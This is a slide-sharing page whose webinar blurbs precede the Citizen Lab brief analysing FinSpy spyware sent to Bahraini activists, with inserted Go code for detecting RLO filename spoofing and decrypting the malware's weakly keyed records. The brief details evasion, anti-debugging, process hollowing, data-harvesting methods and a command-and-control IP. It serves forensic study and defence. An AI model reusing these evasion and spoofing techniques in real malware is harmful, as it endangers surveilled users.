Presentation of the paper "Trusted Execution Environment for Decentralized Process Mining" given during the CAiSE 2024 Conference in Cyprus on June 7, 2024.
Best 20 SEO Techniques To Improve Website Visibility In SERP - Pixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
HCL Notes and Domino License Cost Reduction in the World of DLAU - panagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU and the licenses under the CCB and CCX model have been a hot topic for many in the HCL community since last year. As a Notes or Domino customer, you may be struggling with unexpectedly high user counts and license fees. You may be wondering how this new kind of licensing works and what benefit it brings you. Above all, you surely want to stay within your budget and save costs wherever possible. We understand that, and we want to help you!
We explain how to resolve common configuration problems that can cause more users to be counted than necessary, and how to identify and remove redundant or unused accounts to save money. There are also some approaches that can lead to unnecessary spending, e.g. using a person document instead of a mail-in for shared mailboxes. We show you such cases and their solutions. And of course we explain the new license model.
Join this webinar, in which HCL Ambassador Marc Thomas and guest speaker Franz Walder introduce you to this new world. It gives you the tools and the know-how to keep an overview. You will be able to reduce your costs through an optimized Domino configuration and keep them low in the future.
These topics are covered
- Reducing license costs by finding and fixing misconfigurations and redundant accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how best to use it
- Tips for common problem areas, such as team mailboxes, functional/test users, etc.
- Practical examples and best practices for immediate implementation
Driving Business Innovation: Latest Generative AI Advancements & Success Story - Safe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
Generating privacy-protected synthetic data using Secludy and Milvus - Zilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
GraphRAG for Life Science to increase LLM accuracy - Tomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx - SitimaJohn
Ocean Lotus cyber threat actors represent a sophisticated, persistent, and politically motivated group that poses a significant risk to organizations and individuals in the Southeast Asian region. Their continuous evolution and adaptability underscore the need for robust cybersecurity measures and international cooperation to identify and mitigate the threats posed by such advanced persistent threat groups.
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
Letter and Document Automation for Bonterra Impact Management (fka Social Sol... - Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on automated letter generation for Bonterra Impact Management using Google Workspace or Microsoft 365.
Interested in deploying letter generation automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Dive into the realm of operating systems (OS) with Pravash Chandra Das, a seasoned Digital Forensic Analyst, as your guide. 🚀 This comprehensive presentation illuminates the core concepts, types, and evolution of OS, essential for understanding modern computing landscapes.
Beginning with the foundational definition, Das clarifies the pivotal role of OS as system software orchestrating hardware resources, software applications, and user interactions. Through succinct descriptions, he delineates the diverse types of OS, from single-user, single-task environments like early MS-DOS iterations, to multi-user, multi-tasking systems exemplified by modern Linux distributions.
Crucial components like the kernel and shell are dissected, highlighting their indispensable functions in resource management and user interface interaction. Das elucidates how the kernel acts as the central nervous system, orchestrating process scheduling, memory allocation, and device management. Meanwhile, the shell serves as the gateway for user commands, bridging the gap between human input and machine execution. 💻
The narrative then shifts to a captivating exploration of prominent desktop OSs, Windows, macOS, and Linux. Windows, with its globally ubiquitous presence and user-friendly interface, emerges as a cornerstone in personal computing history. macOS, lauded for its sleek design and seamless integration with Apple's ecosystem, stands as a beacon of stability and creativity. Linux, an open-source marvel, offers unparalleled flexibility and security, revolutionizing the computing landscape. 🖥️
Moving to the realm of mobile devices, Das unravels the dominance of Android and iOS. Android's open-source ethos fosters a vibrant ecosystem of customization and innovation, while iOS boasts a seamless user experience and robust security infrastructure. Meanwhile, discontinued platforms like Symbian and Palm OS evoke nostalgia for their pioneering roles in the smartphone revolution.
The journey concludes with a reflection on the ever-evolving landscape of OS, underscored by the emergence of real-time operating systems (RTOS) and the persistent quest for innovation and efficiency. As technology continues to shape our world, understanding the foundations and evolution of operating systems remains paramount. Join Pravash Chandra Das on this illuminating journey through the heart of computing. 🌟
Fueling AI with Great Data with Airbyte Webinar - Zilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
1. !
!
!
!
!
Research Brief
The Citizen Lab Number 09 – July 2012
From Bahrain with Love:
FinFisher’s Spy Kit Exposed?
INTRODUCTION
The FinFisher Suite is described by its distributors, Gamma International UK Ltd., as “Governmental IT
Intrusion and Remote Monitoring Solutions.” 1 The toolset first gained notoriety after it was revealed that the
Egyptian Government’s state security apparatus had been involved in negotiations with Gamma International
UK Ltd. over the purchase of the software. Promotional materials have been leaked that describe the tools as
providing a wide range of intrusion and monitoring capabilities.2 Despite this, however, the toolset itself has
not been publicly analyzed.
This post contains analysis of several pieces of malware obtained by Vernon Silver of Bloomberg News that
were sent to Bahraini pro-democracy activists in April and May of this year. The purpose of this work is
identification and classification of the malware to better understand the actors behind the attacks and the risk
to victims. In order to accomplish this, we undertook several different approaches during the investigation.
As well as directly examining the samples through static and dynamic analysis, we infected a virtual machine
(VM) with the malware. We monitored the filesystem, network, and running operating system of the infected
VM.
This analysis suggests the use of “Finspy”, part of the commercial intrusion kit, Finfisher, distributed by
Gamma International.
DELIVERY
This section describes how the malware was delivered to potential victims using e-mails with malicious
attachments.
In early May, we were alerted that Bahraini activists were targeted with apparently malicious e-mails. The
emails ostensibly pertained to the ongoing turmoil in Bahrain, and encouraged recipients to open a series of
suspicious attachments. The screenshot below is indicative of typical message content:
The attachments to the e-mails we have been able to analyze were typically .rar files, which we found to
contain malware. Note that the apparent sender has an e-mail address that indicates that it was being sent by
“Melissa Chan,” who is a real correspondent for Aljazeera English. We suspect that the e-mail address is not
her real address.3 The following samples were examined:
324783fbc33ec117f971cca77ef7ceaf7ce229a74edd6e2b3bd0effd9ed10dcc rar.
c5b39d98c85b21f8ac1bedd91f0b6510ea255411cf19c726545c1d0a23035914 _gpj.ArrestedXSuspects.rar
c5b37bb3620d4e7635c261e5810d628fc50e4ab06b843d78105a12cfbbea40d7 KingXhamadXonXofficialXvisitXtoX.rar
80fb86e265d44fbabac942f7b26c973944d2ace8a8268c094c3527b83169b3cc MeetingXAgenda.rar
f846301e7f190ee3bb2d3821971cc2456617edc2060b07729415c45633a5a751 Rajab.rar
These contained executables masquerading as picture files or documents:
49000fc53412bfda157417e2335410cf69ac26b66b0818a3be7eff589669d040 dialoge.exe
cc3b65a0f559fa5e6bf4e60eef3bffe8d568a93dbb850f78bdd3560f38218b5c exe.Rajab1.jpg
39b325bd19e0fe6e3e0fca355c2afddfe19cdd14ebda7a5fc96491fc66e0faba exe.image1.jpg
e48bfeab2aca1741e6da62f8b8fc9e39078db574881691a464effe797222e632 exe.Rajab.jpg
2ec6814e4bad0cb03db6e241aabdc5e59661fb580bd870bdb50a39f1748b1d14 exe.Arrested Suspects.jpg
c29052dc6ee8257ec6c74618b6175abd6eb4400412c99ff34763ff6e20bab864 News about the existence of a new dialogue between AlWefaq & Govt..doc
The emails generally suggested that the attachments contained political content of interest to pro-democracy
activists and dissidents. In order to disguise the nature of the attachments, a malicious usage of the
“right-to-left override” (RLO) character was employed. The RLO character (U+202E in Unicode) controls the
positioning of characters in text containing characters flowing from right to left, such as Arabic or Hebrew.
The malware appears on a victim’s desktop as “exe.Rajab1.jpg” (for example), along with the default
Windows icon for a picture file without a thumbnail. But when the UTF-8 based filename is displayed in
ANSI, the name is displayed as “gpj.1bajaR.exe”. Believing that they are opening a harmless “.jpg”, victims
are instead tricked into running an executable “.exe” file.4
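As an added illustration that is not part of the Citizen Lab brief, the Go program below shows how a defender can detect this disguise before a user is fooled by it: it lists any Unicode bidirectional control characters in a file name, computes the extension the operating system will actually act on once those controls are stripped, and approximates the name a file manager displays. The names it checks are constructed from the examples above with the RLO character restored at the front. The display simulation only reverses the text that follows an RLO (up to a PDF or the end of the name), which is exact for the Latin-script names in question but is not a full implementation of the Unicode bidi algorithm.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// Unicode bidirectional control characters that can reorder how a file name
// is displayed. U+202E (RLO) is the one used against the Bahraini activists.
var bidiControls = map[rune]string{
	'\u202A': "LRE", '\u202B': "RLE", '\u202C': "PDF", '\u202D': "LRO", '\u202E': "RLO",
	'\u2066': "LRI", '\u2067': "RLI", '\u2068': "FSI", '\u2069': "PDI",
}

// BidiControls lists the bidi control characters present in name, in order.
func BidiControls(name string) []string {
	var found []string
	for _, r := range name {
		if tag, ok := bidiControls[r]; ok {
			found = append(found, tag)
		}
	}
	return found
}

// TrueExtension returns the extension the operating system actually acts on:
// the suffix of the name once every bidi control is removed, lower-cased.
func TrueExtension(name string) string {
	clean := strings.Map(func(r rune) rune {
		if _, ok := bidiControls[r]; ok {
			return -1 // drop the control character
		}
		return r
	}, name)
	return strings.ToLower(filepath.Ext(clean))
}

// RenderedName approximates what a file manager shows: the text after an RLO
// is drawn reversed until a PDF (U+202C) or the end of the name. This is a
// deliberate simplification of the Unicode bidi algorithm; it is exact for the
// Latin-script names in the brief but not for mixed-script names.
func RenderedName(name string) string {
	var out, run []rune
	reversing := false
	flush := func() {
		for i := len(run) - 1; i >= 0; i-- {
			out = append(out, run[i])
		}
		run = run[:0]
	}
	for _, r := range name {
		switch r {
		case '\u202E':
			flush()
			reversing = true
		case '\u202C':
			flush()
			reversing = false
		default:
			if reversing {
				run = append(run, r)
			} else {
				out = append(out, r)
			}
		}
	}
	flush()
	return string(out)
}

// ExtensionMismatch reports whether the extension a user sees differs from the
// one the OS will execute, the tell-tale sign of the RLO disguise.
func ExtensionMismatch(name string) bool {
	return strings.ToLower(filepath.Ext(RenderedName(name))) != TrueExtension(name)
}

func main() {
	// Constructed names: the disguised ones are the brief's examples with the
	// RLO character restored at the front; the last one is a benign control.
	for _, n := range []string{"\u202Egpj.1bajaR.exe", "\u202Egpj.stcepsuS detserrA.exe", "MeetingAgenda.doc"} {
		fmt.Printf("shown as %-28q real ext %-5s controls %v suspicious=%v\n",
			RenderedName(n), TrueExtension(n), BidiControls(n), ExtensionMismatch(n))
	}
}
```

A mail gateway or endpoint agent can apply the same two checks (any bidi control present, and displayed extension differing from the real one) to attachment names and archive members; the RLO character is essentially never legitimate at the start of a Latin-script file name.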
Upon execution these files install a multi-featured trojan on the victim’s computer. This malware provides the
attacker with clandestine remote access to the victim’s machine as well as comprehensive data harvesting and
exfiltration capabilities.
INSTALLATION
This section describes how the malware infects the target machine.
The malware displays a picture as expected. This differs from sample to sample. The sample “Arrested
Suspects.jpg” (“gpj.stcepsuS detserrA.exe”) displays:
It additionally creates a directory (which appears to vary from sample to sample):
C:\Documents and Settings\XPMUser\Local Settings\Temp\TMP51B7AFEF
It copies itself there (in this case the malware appears as “Arrested Suspects.jpg”) where it is renamed:
C:\Documents and Settings\XPMUser\Local Settings\Temp\TMP51B7AFEF\Arrested Suspects.jpg =>
C:\Documents and Settings\XPMUser\Local Settings\Temp\TMP51B7AFEF\tmpD.tmp
Then it drops the following files:
C:\DOCUME~1\%USER%\LOCALS~1\Temp\delete.bat
C:\DOCUME~1\%USER%\LOCALS~1\Temp\driverw.sys
It creates the folder (the name of which varies from host to host):
C:\Documents and Settings\%USER%\Application Data\Microsoft\Installer\{5DA45CC9-D840-47CC-9F86-FD2E9A718A41}
This process is observable on the filesystem timeline of the infected host:
“driverw.sys” is loaded and then “delete.bat” is run which deletes the original payload and itself. It then
infects existing operating system processes, connects to the command and control server, and begins data
harvesting and exfiltration.
Examining the memory image of a machine infected with the malware shows that a technique for infecting
processes known as “process hollowing” is used. For example, the memory segment below from the
“winlogon.exe” process is marked as executable and writeable:
Here the malware starts a new instance of a legitimate process such as “winlogon.exe” and before the
process’s first thread begins, the malware de-allocates the memory containing the legitimate code and injects
malicious code in its place. Dumping and examining this memory segment reveals the following strings in the
infected process:
Note the string:
y:\lsvn_branches\finspyv4.01\finspyv2\src\libs\libgmp\mpn-tdiv_qr.c
This file seems to correspond to a file in the GNU Multi-Precision arithmetic library:
http://gmplib.org:8000/gmp/file/b5ca16212198/mpn/generic/tdiv_qr.c
The process “svchost.exe” was also found to be infected in a similar manner:
Further examination of the memory dump also reveals the following:
This path appears to reference the functionality that the malware uses to modify the boot sequence to enable
persistence:
y:\lsvn_branches\finspyv4.01\finspyv2\src\target\bootkit_x32driver\objfre_w2k_x86\i386\bootkit_x32driver.pdb
A pre-infection vs post-infection comparison of the infected VM shows that the Master Boot Record (MBR)
was modified by code injected by the malware.
The strings found in memory “finspyv4.01” and “finspyv2” are particularly interesting. The FinSpy tool is
part of the FinFisher intrusion and monitoring toolkit.5
OBFUSCATION AND EVASION
This section describes how the malware is designed to resist analysis and evade identification.
The malware employs a myriad of techniques designed to evade detection and frustrate analysis. While
investigation into this area is far from complete, we discuss several discovered methods as examples of the
lengths taken by the developers to avoid identification.
A virtualised packer is used. This type of obfuscation is used by those that have “strong motives to prevent
their malware from being analyzed”.6
This converts the native x86 instructions of the malware into another custom language chosen from one of 11
code templates. At run-time, this is interpreted by an obfuscated interpreter customized for that particular
language. This virtualised packer was not recognised and appears to be bespoke.
Several anti-debugging techniques are used. This section of code crashes the popular debugger, OllyDbg.
.text:00401683 finit
.text:00401686 fld ds:tbyte_40168E
.text:0040168C jmp short locret_401698
———————————————————————
.text:0040168E tbyte_40168E dt 9.2233720368547758075e18
———————————————————————
.text:00401698 locret_401698:
.text:00401698 retn
This float value causes OllyDbg to crash when trying to display its value. A more detailed explanation of this
can be found here.
To defeat DbgBreakPoint based debuggers, the malware finds the address of DbgBreakPoint, makes the page
EXECUTE_READWRITE and writes a NOP on the entry point of DbgBreakPoint.
The malware checks the PEB to detect whether or not it is being debugged, and if it is, it returns a random
address.
The malware calls ZwSetInformationThread with ThreadInformationClass set to 0x11, which causes the
thread to be detached from the debugger.
The malware calls ZwQueryInformationProcess with ProcessInformationClass set to 0x7 (ProcessDebugPort)
and 0x1e (ProcessDebugObjectHandle) to detect the presence of a debugger. If a debugger is detected it jumps
to a random address. ZwQueryInformationProcess is also called to check the DEP status of the current
process, and the malware disables DEP if it is found to be enabled.
The malware deploys a granular solution for Antivirus software, tailored to the AV present on the infected
machine. The malware calls ZwQuerySystemInformation to get ProcessInformation and ModuleInformation.
The malware then walks the list of processes and modules looking for installed AV software. Our analysis
indicates that the malware appears to have different code to Open/Create process and inject for each AV
solution. For some Anti-Virus software this even appears to be version dependent. The function
“ZwQuerySystemInformation” is also hooked by the malware, a technique frequently used to allow process
hiding:
DATA HARVESTING AND ENCRYPTION
This section describes how the malware collects and encrypts data from the infected machine.
Our analysis showed that the malware collects a wide range of data from an infected victim. The data is
stored locally in a hidden directory, and is disguised with encryption prior to exfiltration. On the reference
victim host, the directory was:
“C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}”.
We conducted forensic examination of the files created in this directory and identified a wide range of data
collected. Files in this directory were found to be screenshots, keylogger data, audio from Skype calls,
passwords and more. For the sake of brevity we include a limited set of examples here.
The malware attempts to locate the configuration and password store files for a variety browsers and chat
clients as seen below:
We observed the creation of the file “t111o00000000.dat” in the data harvesting directory, as shown in the
filesystem timeline below:
Thu Jun 14 2012 12:31:34 52719 mac. r/rr-xr-xr-x 0 0 26395-128-5 C:/WINDOWS/Installer/{49FD463C-18F1-63C4-8F12-49F518F127}/09e493e2-05f9-4899-b661-c52f3554c644
Thu Jun 14 2012 12:32:18 285691 …b r/rrwxrwxrwx 0 0 26397-128-4 C:/WINDOWS/Installer/{49FD463C-18F1-63C4-8F12-49F518F127}/t111o00000000.dat
Thu Jun 14 2012 12:55:12 285691 mac. r/rrwxrwxrwx 0 0 26397-128-4 C:/WINDOWS/Installer/{49FD463C-18F1-63C4-8F12-49F518F127}/t111o00000000.dat
4096 ..c. -/rr-xr-xr-x 0 0 26447-128-4
The infected process “winlogon.exe” was observed writing this file via Process:
Examination of this file reveals that it is a screenshot of the desktop:
Many other modules providing specific exfiltration capabilities were observed. Generally, the exfiltration
modules write files to disk using the following naming convention: XXY1TTTTTTTT.dat. XX is a two-digit
hexadecimal module number, Y is a single-digit hexadecimal submodule number, and TTTTTTTT is a
hexadecimal representation of a unix timestamp (less 1.3 billion) associated with the file creation time.
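To make the naming convention concrete, here is an added Go example (not from the brief) that decodes such a name into its module, submodule and creation time. Applied to 1431028D41FD.dat, the Skype file-transfer output described later in the brief, it yields module 0x14, submodule 3 and 2012-07-20 19:18:21 UTC, which agrees to the second with the 2012-07-20 12:18:21 timestamp recorded inside that file if its “-0800 UTC DST” marker means UTC-7. Names that do not follow the pattern, such as t111o00000000.dat above, are rejected rather than guessed at.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"time"
)

// TimestampBase is the offset the brief reports: TTTTTTTT is the Unix time less 1.3 billion.
const TimestampBase int64 = 1300000000

// DatName is the decoded form of an exfiltration file name XXY1TTTTTTTT.dat.
type DatName struct {
	Module    int       // XX, two hex digits (0x14 is the Skype module in the brief)
	Submodule int       // Y, one hex digit
	Created   time.Time // file creation time, in UTC
}

// XX and Y are hex, the literal "1" follows, then eight hex digits of timestamp.
var datPattern = regexp.MustCompile(`^([0-9A-Fa-f]{2})([0-9A-Fa-f])1([0-9A-Fa-f]{8})\.dat$`)

// ParseDatName decodes a name that follows the convention. Names that do not
// fit (t111o00000000.dat, for instance) return an error instead of a guess.
func ParseDatName(name string) (DatName, error) {
	m := datPattern.FindStringSubmatch(name)
	if m == nil {
		return DatName{}, fmt.Errorf("%q does not follow XXY1TTTTTTTT.dat", name)
	}
	// The regexp already guarantees these parse, so the errors are ignored.
	mod, _ := strconv.ParseInt(m[1], 16, 32)
	sub, _ := strconv.ParseInt(m[2], 16, 32)
	ts, _ := strconv.ParseInt(m[3], 16, 64)
	return DatName{
		Module:    int(mod),
		Submodule: int(sub),
		Created:   time.Unix(ts+TimestampBase, 0).UTC(),
	}, nil
}

func main() {
	// Constructed input: one name from the brief that fits, one that does not.
	for _, n := range []string{"1431028D41FD.dat", "t111o00000000.dat"} {
		d, err := ParseDatName(n)
		if err != nil {
			fmt.Println(err)
			continue
		}
		fmt.Printf("%s: module 0x%02X submodule %d created %s\n",
			n, d.Module, d.Submodule, d.Created.Format(time.RFC3339))
	}
}
```

Decoding the names this way lets an analyst build a timeline of collection activity from a directory listing alone, before any record has been decrypted.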
ENCRYPTION
The malware uses encryption in an attempt to disguise harvested data in the .dat files intended for exfiltration.
Data written to the files is encrypted using AES-256-CBC (with no padding). The 32-byte key consists of 8
readings from memory address 0x7ffe0014: a special address in Windows that contains the low-order-4-bytes
of the number of hundred-nanoseconds since 1 January 1601. The IV consists of 4 additional readings.
The AES key structure is highly predictable, as the quantum for updating the system clock
(HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Config\LastClockRate) is set to 0x2625A
hundred-nanoseconds by default, and the clock readings that comprise the key and IV are taken in a tight loop:
…
0x406EA4: 8D45C0 LEA EAX,[EBP-0x40]
0x406EA7: 50 PUSH EAX
0x406EA8: FF150C10AF01 CALL DWORD PTR [0x1AF100C]
0x406EAE: 8B4DE8 MOV ECX,DWORD PTR [EBP-0x18]
0x406EB1: 8B45C0 MOV EAX,DWORD PTR [EBP-0x40]
0x406EB4: 8345E804 ADD DWORD PTR [EBP-0x18],0x4
0x406EB8: 6A01 PUSH 0x1
0x406EBA: 89040F MOV DWORD PTR [EDI+ECX],EAX
0x406EBD: FF152810AF01 CALL DWORD PTR [0x1AF1028]
0x406EC3: 817DE800010000 CMP DWORD PTR [EBP-0x18],0x100
0x406ECA: 72D8 JB 0x406EA4
0x406ECC: 80277F AND BYTE PTR [EDI],0x7F
…
The following AES keys were among those found to be used to encrypt records in .dat files. The first contains
the same 4 bytes repeated, whereas in the second key, the difference between all consecutive 4-byte blocks
(with byte order swapped) is 0x2625A.
70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc
26 e9 23 60 80 4b 26 60 da ad 28 60 34 10 2b 60 8e 72 2d 60 e8 d4 2f 60 42 37 32 60 9c 99 34 60
In all, 64 clock readings are taken. The readings are encrypted using an RSA public key found in memory
(whose modulus begins with A25A944E) and written to the .dat file before any other encrypted data. No
padding is used in the encryption, yielding exactly 256 encrypted bytes. After the encrypted timestamp
values, the file contains a number of records encrypted with AES, delimited by EAE9E8FF.
In reality, these records are only partially encrypted: if the record’s length is not a multiple of 16 bytes (the
AES block size), then the remainder of the bytes are written to the file unencrypted. For example, after typing
“FinSpy” on the keyboard, the keylogger module produced the following (trailing plaintext highlighted):
The predictability of the AES encryption keys allowed us to decrypt and view these partially-encrypted
records in full plaintext. The nature of the records depends on the particular module and submodule. For
example, submodule Y == 5 of the Skype exfiltration module (XX == 14), contains a csv representation of the
user’s contact list:
Record # 0 Length: 243 bytes:
ó
@þÿ̳Ð
@
¤b¯Opþ192.168.131.67JRecordingEcsv 0þ-0800UTC DST.1þ2012-07-18 18:00:21.:þ1970-01-01
00:16:00Abhwatch1
Record # 1 Length: 96 bytes:
`USERNAME,FULLNAME,COUNTRY,AUTHORIZED,BLOCKED
Record # 2 Length: 90 bytes:
Zecho123,Echo / Sound Test Service,,YES,NO
Record # 3 Length: 95 bytes:
^bhwatch2,Bahrain Watch,United States,YES,NO
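As an added worked example (not code from the brief, and not the malware's own), the Go program below turns the key observations above into checks an analyst can run. ReadingSteps tests whether 32 bytes of key material look like consecutive little-endian clock readings spaced a whole number of 0x2625A quanta apart; both keys listed above pass, with spacings of 0 and 1 quantum respectively. PredictedKeyIV regenerates key and IV from a single first reading, under the assumption (ours, not stated in the brief) that the key occupies readings 0 to 7 and the IV readings 8 to 11, each stored as a little-endian dword as the loop above does. DecryptRecord reverses the partial encryption by running AES-256-CBC without padding over whole 16-byte blocks only and copying the remainder through unchanged. Because the original .dat files are not reproduced in the brief, the contact-list record it decrypts is constructed here with the matching EncryptRecord.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"strings"
)

// Default W32Time LastClockRate quoted in the brief: 0x2625A hundred-nanosecond units.
const ClockQuantum uint32 = 0x2625A

// The two AES-256 keys listed in the brief, constructed here from its hex dump.
var (
	KeyRepeated = mustHex("70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc 70 31 bd cc")
	KeyStepped  = mustHex("26 e9 23 60 80 4b 26 60 da ad 28 60 34 10 2b 60 8e 72 2d 60 e8 d4 2f 60 42 37 32 60 9c 99 34 60")
)

func mustHex(s string) []byte {
	b, err := hex.DecodeString(strings.ReplaceAll(s, " ", ""))
	if err != nil {
		panic(err)
	}
	return b
}

// ReadingSteps interprets key material as consecutive little-endian clock readings.
// It returns the first reading and, for every later dword, how many clock quanta
// it lies ahead of its predecessor; ok is false if any gap is not a whole number
// of quanta, i.e. the bytes do not look like a clock-derived key of this kind.
func ReadingSteps(key []byte) (first uint32, steps []uint32, ok bool) {
	if len(key) < 4 || len(key)%4 != 0 {
		return 0, nil, false
	}
	prev := binary.LittleEndian.Uint32(key)
	first = prev
	for off := 4; off < len(key); off += 4 {
		cur := binary.LittleEndian.Uint32(key[off:])
		d := cur - prev // uint32 arithmetic absorbs the low dword wrapping around
		if d%ClockQuantum != 0 {
			return first, nil, false
		}
		steps = append(steps, d/ClockQuantum)
		prev = cur
	}
	return first, steps, true
}

// PredictedKeyIV builds the 32-byte key (8 readings) and 16-byte IV (4 more
// readings) the brief describes, assuming every reading advances by the same
// number of quanta. Assumption: the key occupies readings 0-7 and the IV 8-11.
func PredictedKeyIV(first, quantaPerReading uint32) (key, iv []byte) {
	buf := make([]byte, 48)
	r := first
	for i := 0; i < 12; i++ {
		binary.LittleEndian.PutUint32(buf[4*i:], r)
		r += quantaPerReading * ClockQuantum
	}
	return buf[:32], buf[32:]
}

// DecryptRecord reverses the partial encryption the brief observed: AES-256-CBC
// with no padding over the largest whole number of 16-byte blocks, with any
// trailing remainder left in the clear.
func DecryptRecord(key, iv, rec []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := len(rec) - len(rec)%aes.BlockSize
	out := make([]byte, len(rec))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out[:n], rec[:n])
	copy(out[n:], rec[n:]) // the unencrypted tail
	return out, nil
}

// EncryptRecord is the matching forward operation, used only to construct a
// sample record; it reproduces the weakness and is not a recommended scheme.
func EncryptRecord(key, iv, plain []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := len(plain) - len(plain)%aes.BlockSize
	out := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out[:n], plain[:n])
	copy(out[n:], plain[n:])
	return out, nil
}

func main() {
	for name, k := range map[string][]byte{"repeated": KeyRepeated, "stepped": KeyStepped} {
		first, steps, ok := ReadingSteps(k)
		fmt.Printf("%-8s first=0x%08x ok=%v steps=%v\n", name, first, ok, steps)
	}
	// Constructed sample: a contact-list record like the one shown in the brief.
	key, iv := PredictedKeyIV(0x6023e926, 1)
	plain := []byte("USERNAME,FULLNAME,COUNTRY,AUTHORIZED,BLOCKED\r\necho123,Echo / Sound Test Service,,YES,NO")
	rec, _ := EncryptRecord(key, iv, plain)
	fmt.Printf("ciphertext tail left in clear: %q\n", rec[len(rec)-len(rec)%aes.BlockSize:])
	pt, _ := DecryptRecord(key, iv, rec)
	fmt.Println("roundtrip ok:", bytes.Equal(pt, plain))
}
```

ReadingSteps is the useful detection primitive: key material whose dwords are all equal, or climb in exact multiples of the clock quantum, is a strong sign that the "key" is really a sequence of KUSER_SHARED_DATA clock reads, and the search space for recovering it collapses from 2^256 to the 32-bit first reading plus a handful of step patterns.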
Submodule Y == 3 records file transfers. After a Skype file transfer concludes, the following file is created:
%USERPROFILE%\Local Settings\Temp\smtXX.tmp. This file appears to contain the sent / received file.
As soon as smtXX.tmp is finished being written to disk, a file (1431XXXXXXXX.dat) is written, roughly the
same size as smtXX.tmp. After sending a picture (of birdshot shotgun shell casings used by Bahrain’s police)
to an infected Skype client, the file 1431028D41FD.dat was observed being written to disk. Decrypting it
revealed the following:
Record # 0 Length: 441 bytes:
¹
@þÿ̳Ð
@
¤b¯Opþ192.168.131.67Abhwatch1Bbhwatch2″CBahrain WatchIreceivedrC:Documents and
SettingsXPMUserMy Documentsgameborev3.jpgJRecording 0þ-0800UTC DST.1þ2012-07-20
12:18:21.:þ2012-07-20 12:18:21
Record # 1 Length: 78247 bytes:
[Note: Record #1 contained the contents of the .jpg file, preceded by hex A731010090051400, and followed
by hex 0A0A0A0A.]
Additionally, submodule Y == 1 records Skype chat messages, and submodule Y == 2 records audio from all
participants in a Skype call. The call recording functionality appears to be provided by hooking
DirectSoundCaptureCreate:
COMMAND AND CONTROL
This section describes the communications behavior of the malware.
When we examined the malware samples we found that they connect to a server at IP address 77.69.140.194
WHOIS data7 reveals that this address is owned by Batelco, the principal telecommunications company of
Bahrain:
inetnum: 77.69.128.0 – 77.69.159.255
netname: ADSL
descr: Batelco ADSL service
country: bh
For a period of close to 10 minutes, traffic was observed between the infected victim and the command and
control host in Bahrain.
A summary of the traffic by port and conversation size:
The infected VM talks to the remote host on the following five TCP ports:
22
53
80
443
4111
